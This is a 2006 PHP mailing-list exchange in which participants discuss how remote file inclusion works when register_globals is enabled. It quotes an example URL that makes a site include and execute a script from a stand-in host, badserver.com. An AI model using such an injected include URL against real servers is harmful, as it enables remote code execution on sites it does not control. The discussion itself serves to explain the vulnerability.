At 1:39 PM -0500 11/14/06, Chris Shiflett wrote:
tedd wrote:
> The script will then include
> http://www.badserver.com/badscript.txt?dummy=script.php
I still don't see how "badscript.php" can be uploaded into
example.com's site in the first place
PHP sends a request to badserver.com for badscript.txt, and the content
of the response is included just as if it were the content of a local file.
Hope that helps.
Chris
Chris;
I'm still confused.
At 7:12 PM +0100 11/13/06, Rory Browne wrote:
If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
If example.com is my domain, then how could evil-doer get access to
my site to place "badscript.php" there?
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
